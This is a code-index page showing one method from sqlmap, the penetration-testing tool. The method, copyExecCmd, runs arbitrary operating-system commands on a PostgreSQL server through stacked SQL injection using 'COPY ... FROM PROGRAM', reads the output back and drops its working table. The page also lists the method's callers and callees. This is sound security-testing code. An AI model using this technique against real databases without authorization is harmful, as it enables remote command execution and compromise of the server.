MCPcopy Index your code
hub / github.com/sqlmapproject/sqlmap / copyExecCmd

Method copyExecCmd

plugins/dbms/postgresql/takeover.py:100–123  ·  view source on GitHub ↗
(self, cmd)

Source from the content-addressed store, hash-verified

98 self.cleanup(onlyFileTbl=True)
99
100 def copyExecCmd(self, cmd):
101 output = None
102
103 if isStackingAvailable():
104 # Reference: https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5
105 self._forgedCmd = "DROP TABLE IF EXISTS %s;" % self.cmdTblName
106 self._forgedCmd += "CREATE TABLE %s(%s text);" % (self.cmdTblName, self.tblField)
107 self._forgedCmd += "COPY %s FROM PROGRAM '%s';" % (self.cmdTblName, cmd.replace("'", "''"))
108 inject.goStacked(self._forgedCmd)
109
110 query = "SELECT %s FROM %s" % (self.tblField, self.cmdTblName)
111 output = inject.getValue(query, resumeValue=False)
112
113 if isListLike(output):
114 output = flattenValue(output)
115 output = filterNone(output)
116
117 if not isNoneValue(output):
118 output = os.linesep.join(output)
119
120 self._cleanupCmd = "DROP TABLE %s" % self.cmdTblName
121 inject.goStacked(self._cleanupCmd)
122
123 return output
124
125 def checkCopyExec(self):
126 if kb.copyExecTest is None:

Callers 3

checkCopyExecMethod · 0.95
execCmdMethod · 0.80
evalCmdMethod · 0.80

Calls 6

isStackingAvailableFunction · 0.90
isListLikeFunction · 0.90
flattenValueFunction · 0.90
filterNoneFunction · 0.90
isNoneValueFunction · 0.90
replaceMethod · 0.45

Tested by

no test coverage detected